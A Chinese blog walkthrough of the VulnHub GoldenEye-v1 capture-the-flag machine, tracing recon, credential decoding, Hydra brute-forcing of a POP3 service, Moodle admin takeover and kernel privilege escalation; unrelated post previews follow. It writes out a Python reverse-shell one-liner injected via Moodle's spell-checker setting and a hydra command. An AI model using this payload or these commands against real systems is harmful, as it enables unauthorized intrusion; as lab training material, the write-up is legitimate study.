vulnhub靶机:GoldenEye-v1_prettyX的博客-程序员秘密

技术标签: 靶机  

靶机介绍

靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/

开始

1、ip探测,本次靶机的ip为:192.168.1.109

//kali
arp-scan -l

2、nmap端口扫描

3、先尝试访问80端口

4、访问robots.txt,404

5、查看网页源码

6、继续查看这个.js文件

“Boris,确保你升级了你的默认密码...”

这个人应该叫Boris,下面是他的默认密码

7、html解码

InvincibleHack3r

结果是:InvincibleHack3r

8、首页信息,叫我们访问/sev-home/,过去看看

需要认证,用上面获得用户名、密码试一下

好吧,用户名首字母需要小写

用户名:boris

密码:InvincibleHack3r

9、登录成功

提示,在非默认端口,开了pop3服务

在上面,nmap已经扫过了,55007开的pop3端口

10、再次查看源码,在页面的最底部

11、使用hydra爆破

爆破成功,所以说,一个强大的字典很关键,但是也有局限性

hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.1.109 -s 55007 pop3

12、可以使用nc 登录

13、这里我们使用foxmail登录,配置如下

14、在Natalya账户中,发现线索

15、根据邮件内容,修改/etc/hosts文件

将靶机IP,关联到邮件提示的域名上

//kali
vim /etc/hosts

16、访问 severnaya-station.com/gnocertdir

17、我们点击,login,用邮件的用户名、密码尝试登录,在第14步中

成功登录

18、继续找线索,找到一个未读消息

获取另一位用户的用户名:doak

19、又用hydra来爆破...

20、foxmail登录,又发现另一个人的账户

21、在moodle训练平台上登录,登录成功

发现一份.txt,下载看看

22、根据提示,查看这个图片,也是醉了

右键描述

base64解码

xWinter1995x!

23、继续搜索线索,在未读消息中,发现管理员用户

24、Logout,尝试admin登录

登录成功,该拿Shell了

25、根据参考文章,需要先更改设置

Plugins-Text editors-TinyMCE,Spell engine选项修改为PSpellShell

26、在如下选项卡中,添加反弹Shell代码

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.109",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

27、本地nc监听端口

28、在如下选项卡下,随便输入,再点击Toggle spellchecker

29、GetShell,这个Shell太艰辛...

Python交换式Shell

python -c 'import pty; pty.spawn("/bin/bash")'

30、下一步该提权了,查看内核版本,uname -a

31、查找对应漏洞

32、Python开启Web服务

//Kali
python3 -m http.server

33、download

34、目标机器,并未安装gcc,这里我们使用cc编译,需要修改源码一处代码,将gcc改为cc

35、下载、cc编译、添加权限、执行

ROOTTTTTT!

结束。

 

参考文章:

https://www.anquanke.com/post/id/156098

https://www.cnblogs.com/appear001/p/12033240.html

https://blog.csdn.net/adminuil/article/details/103824141

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prettyX/article/details/105340528

智能推荐

prometheus使用 (十六) alertmanager特性--告警抑制_默子昂的博客-程序员秘密_alertmanager 抑制

2. 抑制抑制是指当某?告警发出后,可以停?重复发送由此告警引发的其它告警的机制。例如,当集群不可访问时触发了?次告警,通过配置Alertmanager可以忽略与该集群有关的其它所有告警。这样可以避免接收到?量与实际问题?关的告警通知。抑制机制同样通过Alertmanager的配置?件进?设置。抑制是指某一告警发出后,可以停止重复发送由此告警引发的其他告警的机制(我们也不想,节点一宕机,pod全给你报错吧)例如: 集群不可访问时触发了一次告警,通过配置alertmanager可以忽...

前端后端分离知识点学习(二)_Cas狗的博客-程序员秘密

前端后端分离知识点学习(二)一、常用的前端模板网站1、Bootstrap自带模板;2、StartBootstrap模板;3、vali-admin的模板;4、百度相关模板;二、beego模板技术搭建页面1、引入css

PTA浙大版《Python 程序设计》题目集_Re:从零开始的代码生活的博客-程序员秘密_pta浙大答案

本题目集是在2021年初写的,当时受疫情影响,题目集是对所有用户开放的,后来题目集就有权限了,需要购买浙大的Python教材才能用。题目集记录了我初学Python时的经历,所以前几道题看起来会不符合Python简洁的特性。初学Python时,没有老师教我,完全就是在自学,所以不会做的题也会上网上搜答案,这就导致题目集中有些题和网上的很相似。其他题目集:PTA浙大版《C语言程序设计实验与习题指导(第3版)》题目集(参考代码)PTA浙大版《C语言程序设计(第3版)》题目集(参考代码)PTA团体程序设

算法与数据结构基础(三)之遍历二叉树_duter_sun先生的博客-程序员秘密

算法与数据结构基础(三)之遍历二叉树前序遍历(递归)中序遍历(递归)后序遍历(递归)测试代码前序遍历(递归)void PreOrder(Node* pParent){ if (pParent == nullptr) return; cout << pParent->value << " "; PreOrder(pParent->left); P...

springboot war打包步骤_c_zyer的博客-程序员秘密

springboot war打包步骤,注意点,出现的问题packaging的设置<packaging>war</packaging> 修改pom.xml文件依赖

string与char*转换(经vs2019测试可行)_lǜ酒红炉zhī影斜的博客-程序员秘密

1.string转换为CString:CString string2CString(string StrData){CString CStrData(StrData.c_str());return CStrData;}2.CString转换为string:string CString2string(CString csStrData){string strRet ;char s...

随便推点

Xilinx Multiboot实例演示_碎碎思的博客-程序员秘密

原理关于Multiboot的原理参考《Xilinx 7系列FPGA Multiboot介绍-远程更新》,基本原理都在此文写的很清楚,本文主要从实例出发演示Multiboot。补充FPGA ...

GB18030字符编码格式和点阵字库_何事误红尘的博客-程序员秘密_gb18030

中国国bai家标准GB2312就是简体中文字符集;台湾计算机界使用的BIG5码是繁体字中文字符集;日本的JIS X0208标准是日文汉字字符集;韩国的KS C5601是韩国汉字字符集。ANSI(美国国家标准学会)推出了一种双字节编码的标准,将上述三国四方的字符集加以统一,称为 ANSI 编码。在简体中文操作系统中,ANSI 编码代表 GBK 编码;在日文操作系统中,ANSI 编码代表 Shift_JIS 编码。 不同 ANSI 编码之间互不兼容,在国际间信息交流时,无法将属于两种语言的文字,存储在同一段 .

解决多表关联转换json内存溢出_lianbancai的博客-程序员秘密

使用Hibernate时候对表关联,在把数据转换成Json时,由于两个字段相互包含,输出会引发内存溢出,下面的方法可以帮助你过滤掉其中一个字段,就不会内存溢出了Gson gson= new GsonBuilder().setExclusionStrategies(new ExclusionStrategy() {  @Override  public boolean shouldSki

tpyBoard102超声波测距2.0--数据滤波_nutron-ma的博客-程序员秘密_超声波滤波

# main.py -- put your code here!"""超声波测距2.0新增:1.加上数据滤波程序,增加准确性马玉华 2020-1-2""""""原理:(1)用IO口给TRIG触发测距,给最少10us的高电平信呈。(2)模块自动发送 8 个 40khz 的方波,自动检测Echo是否有信号返回。(3)Echo有信号返回,通过io输出一个高电平,高电平持续的时间就是...

css盒子模型_m0_59737891的博客-程序员秘密

盒模型的认识基本概念:标准模型+IE模型。 包括margin,border,padding,content 标准模型和IE模型的区别 css如何设置获取这两种模型的宽和高 js如何设置获取盒模型对应的宽和高 根据盒模型解释边距重叠 BFC(边距重叠解决方案,还有IFC)解决边距重叠一、基本概念:标准模型+IE模型什么是盒模型:盒模型又称框模型(Box Model),包含了元素内容(content)、内边距(padding)、边框(border)、外边距(margin)几个要素。如图:

如何利用MSDN在线查询MFC里面的API_kuer6983的博客-程序员秘密

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。本文链接:https://blog.csdn.net/qq_37769473/article/details/828316681. 进入MSDN:https://msdn.microsoft.com/zh-cn/2. 找到查询框3. 输入函数并查询4. 找到对应的Vi...